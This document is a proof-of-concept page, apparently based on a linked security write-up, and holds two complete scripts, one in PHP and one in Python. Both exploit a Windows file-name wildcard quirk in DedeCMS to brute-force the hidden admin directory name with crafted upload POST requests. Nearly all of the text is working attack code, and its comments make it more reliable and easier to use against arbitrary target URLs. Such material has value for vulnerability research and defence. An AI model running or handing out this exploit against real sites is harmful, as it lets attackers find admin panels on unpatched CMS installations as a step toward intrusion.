Windows targets only. Every probe path below contains a `<` character; the technique depends on how Windows file-name lookup interprets it (a wildcard, per the linked write-up), so against a Linux host the `<` is a literal character and every probe is rejected.
Original write-up: https://xz.aliyun.com/t/2064
PoC — two equivalent implementations follow, a PHP script and then a Python 2 script. Both enumerate the DedeCMS admin directory name character by character by POSTing crafted `_FILES[...][tmp_name]` values to the front page and treating the absence of the `Upload filetype not allow !` response as a hit.
<?php
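// Target base URL. The trailing slash is stripped here so that the URLs built
// from $domain below do not contain '//' (the original produced
// 'http://localhost/dedecms//index.php').
$domain = rtrim('http://localhost/dedecms/', '/');
// Every probe is POSTed to the front page; no admin session is required.
$url = $domain . '/index.php';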
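/**
 * Send a form-encoded POST to $url and return the raw HTTP response
 * (status line, headers and body, because CURLOPT_HEADER is enabled).
 *
 * @param string $url    Absolute URL to post to.
 * @param string $data   Raw application/x-www-form-urlencoded body.
 * @param string $cookie Optional Cookie header value.
 * @return string        Full response text.
 * @throws RuntimeException When curl cannot complete the request. The original
 *                          returned curl's `false` silently; the callers then ran
 *                          strpos(false, ...) which is also `false`, i.e. every
 *                          transport failure was counted as a successful probe.
 */
function post($url, $data, $cookie = '') {
    $ch = curl_init($url);
    curl_setopt_array($ch, array(
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_HEADER         => true,
        CURLOPT_POST           => true,
        // Lab-only: TLS verification is disabled so self-signed test targets
        // work. The original listed CURLOPT_SSL_VERIFYHOST twice; the second
        // entry overwrote the first and CURLOPT_SSL_VERIFYPEER was never set,
        // so HTTPS targets with an untrusted certificate failed every request.
        CURLOPT_SSL_VERIFYHOST => 0,
        CURLOPT_SSL_VERIFYPEER => false,
        CURLOPT_COOKIE         => $cookie,
        CURLOPT_POSTFIELDS     => $data,
        // Bound each probe so a stalled target cannot hang the enumeration loops.
        CURLOPT_CONNECTTIMEOUT => 10,
        CURLOPT_TIMEOUT        => 30,
    ));
    $result = curl_exec($ch);
    $error = curl_error($ch);
    curl_close($ch);
    if ($result === false) {
        throw new RuntimeException("POST to $url failed: $error");
    }
    return $result;
}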
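// Alphabet tried for each position of the admin directory name: lowercase
// letters and digits only. Windows file-name matching is case-insensitive, so
// uppercase candidates would only duplicate work; names containing other
// characters (e.g. '_') cannot be found unless they are added here.
// (The original also defined an unused $testlen.)
$dic = array_merge(range('a', 'z'), range(0, 9));
$n = true;    // true while the two-character prefix has not been found
$nn = true;   // true while the name is still being extended
$path = '';   // directory name recovered so far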
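// Step 1: find the first two characters of the admin directory.
// A probe submits "./XY</images/admin_top_logo.gif" as an upload tmp_name; the
// "Upload filetype not allow !" message disappears only when that path resolves
// (presumably because Windows treats the '<' as a wildcard — see the linked
// write-up). Two characters are probed at once, following the original PoC.
// The original `while($n)` never terminated when no prefix matched (patched
// target, non-Windows host, name outside the dictionary); a single pass is made
// now and the script exits with an explanation instead.
foreach ($dic as $v) {
    foreach ($dic as $vv) {
        $post_data = "dopost=save&_FILES[b4dboy][tmp_name]=./$v$vv</images/admin_top_logo.gif&_FILES[b4dboy][name]=0&_FILES[b4dboy][size]=0&_FILES[b4dboy][type]=image/gif";
        $result = post($url, $post_data);
        // A hit is a 200 whose body lacks the rejection string; an error page
        // or redirect (any other status) is not a hit, matching the Python PoC.
        if (strpos($result, 'Upload filetype not allow !') === false
            && preg_match('#^HTTP/\S+ 200#m', $result) === 1) {
            $path = $v . $vv;
            $n = false;
            break 2;
        }
    }
}
if ($n) {
    fwrite(STDERR, "No two-character prefix matched; target is probably patched, not on Windows, or uses characters outside the dictionary." . PHP_EOL);
    exit(1);
}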
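// Step 2: extend the prefix one character at a time.
// A probe for "./<path><c></images/admin_top_logo.gif" succeeds when some
// directory starts with path+c. A prefix hit alone does not say whether the
// name is complete, so completion is confirmed by fetching
// <domain>/<path>/images/admin_top_logo.gif directly.
// After a hit the inner loop keeps scanning $dic from its current position,
// so characters that sort earlier are only picked up on the next outer pass.
// The original `while($nn)` never terminated when the completion fetch never
// succeeded (logo missing, outbound HTTP blocked, allow_url_fopen off, name
// outside the dictionary); now a pass that adds no character ends the search
// and the candidate length is capped.
$maxLen = 64;
while ($nn) {
    $grew = false;
    foreach ($dic as $vvv) {
        $post_data = "dopost=save&_FILES[b4dboy][tmp_name]=./$path$vvv</images/admin_top_logo.gif&_FILES[b4dboy][name]=0&_FILES[b4dboy][size]=0&_FILES[b4dboy][type]=image/gif";
        $result = post($url, $post_data);
        // A hit is a 200 whose body lacks the rejection string; any other
        // status (error page, redirect) is not, matching the Python PoC.
        if (strpos($result, 'Upload filetype not allow !') !== false
            || preg_match('#^HTTP/\S+ 200#m', $result) !== 1) {
            continue;
        }
        $path .= $vvv;
        $grew = true;
        echo $path . PHP_EOL;
        // '@' is deliberate: a 404 makes file_get_contents() emit a warning.
        $giturl = $domain . '/' . $path . '/images/admin_top_logo.gif';
        if (@file_get_contents($giturl)) {
            echo $domain . '/' . $path . '/';
            $nn = false;
            break;
        }
        if (strlen($path) >= $maxLen) {
            fwrite(STDERR, "Gave up: candidate '$path' reached $maxLen characters without the logo becoming fetchable." . PHP_EOL);
            $nn = false;
            break;
        }
    }
    if ($nn && !$grew) {
        fwrite(STDERR, "No character extends '$path'; the name may use characters outside the dictionary, or the logo is not fetchable from here. Partial result printed above." . PHP_EOL);
        $nn = false;
    }
}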
?>
#!/usr/bin/env python
#coding:utf-8
import requests
import string
# Alphabet tried for every position of the admin directory name: ASCII letters
# of both cases, digits, and the three punctuation characters '_', '#', '!'.
login_str = "".join([string.ascii_letters, string.digits, "_#!"])
# Static browser-like request headers sent with every probe; requests adds the
# Content-Type for the form body itself.
_USER_AGENT = "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0"
_ACCEPT = "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
_ACCEPT_LANGUAGE = "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3"

headers = {}
headers["User-Agent"] = _USER_AGENT
headers["Accept"] = _ACCEPT
headers["Accept-Language"] = _ACCEPT_LANGUAGE
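def chek_poc(v, letter):
    """Build the form fields that probe for an admin directory starting with ``letter``.

    v: DedeCMS version as a number or numeric string ('5.7'). Per the original
       PoC, versions <= 5.6 keep the admin logo under ``img/`` and later ones
       under ``images/``. The original compared the raw argument; with the
       string '5.7' that only worked by accident on Python 2 (str never compares
       <= a float there) and raises TypeError on Python 3, so it is converted
       with float() first.
    letter: the directory-name prefix tried so far.
    Returns the dict passed as ``data=`` to requests.post.
    """
    logo_dir = "img" if float(v) <= 5.6 else "images"
    return {
        "dopost": "save",
        # The '<' after the prefix is what makes this a prefix probe on Windows
        # (see the note at the top of the page).
        "_FILES[b4dboy][tmp_name]": "./%s</%s/admin_top_logo.gif" % (letter, logo_dir),
        "_FILES[b4dboy][name]": 0,
        "_FILES[b4dboy][size]": 0,
        "_FILES[b4dboy][type]": "image/gif",
    }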
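def get_login_site(version, url, max_rounds=9):
    """Enumerate the DedeCMS admin directory name on a Windows host.

    version: DedeCMS version, see chek_poc().
    url: URL the probes are POSTed to, used as given (the PHP PoC on this page
         posts to the site's index.php).
    max_rounds: upper bound on extension rounds after the two-character prefix;
         the original always ran exactly nine.
    Returns the name found so far ("" when no two-character prefix matched).

    A probe is a hit when the response is HTTP 200 and its body lacks
    "Upload filetype not allow !". requests raises on transport errors, so a
    dead target is reported instead of being counted as a hit.
    """
    print("Testing..............")

    def hit(prefix):
        # One probe; the timeout keeps a stalled target from hanging the scan.
        # .text rather than .content: on Python 3 .content is bytes and the
        # `str in bytes` test of the original raises TypeError.
        req = requests.post(url, headers=headers, data=chek_poc(version, prefix), timeout=15)
        return req.status_code == 200 and "Upload filetype not allow !" not in req.text

    # Step 1: the first two characters, following the original PoC.
    web_site = ""
    for l in login_str:
        for i in login_str:
            print(l + i)
            if hit(l + i):
                web_site = l + i
                print("[+ %s]" % web_site)
                break
        if web_site:
            break
    if not web_site:
        # The original carried on extending an empty prefix here.
        print("[-] no two-character prefix matched; target may be patched, not on Windows, or use characters outside login_str")
        return web_site

    # Step 2: one character per round. A round that adds nothing means no
    # candidate extends the name, so further rounds cannot either; the original
    # kept probing for the full nine rounds regardless.
    for _ in range(max_rounds):
        for u in login_str:
            if hit(web_site + u):
                web_site = web_site + u
                print("[+ %s]" % web_site)
                break
        else:
            break
    return web_site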
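if __name__ == '__main__':
    import sys
    # Usage: python poc.py [url] [version]. Defaults keep the original lab
    # target. The version is passed as a float rather than the original '5.7'
    # string, which chek_poc only handled correctly by accident on Python 2.
    target = sys.argv[1] if len(sys.argv) > 1 else "http://127.0.0.1"
    dede_version = float(sys.argv[2]) if len(sys.argv) > 2 else 5.7
    get_login_site(dede_version, target)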